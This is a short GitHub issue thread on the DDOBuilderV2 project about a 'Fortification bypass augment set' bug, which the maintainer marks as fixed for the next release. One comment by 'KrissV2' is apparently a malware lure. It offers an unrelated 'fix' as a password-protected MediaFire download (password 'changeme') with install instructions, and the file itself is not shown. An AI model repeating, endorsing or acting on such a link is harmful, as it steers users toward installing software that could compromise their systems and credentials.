### ISSUE TITLE
Fortification bypass augment set 

### ISSUE THREAD

**Issue by Mummykiller** [Maetrim/DDOBuilderV2#151]
![image](https://github.com/user-attachments/assets/34973e0f-8060-468b-9424-e990e37b6446)
![image](https://github.com/user-attachments/assets/467ee5af-6e97-4685-b469-20d05a05e320)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Maetrim** [comment]
Fixed for next release.
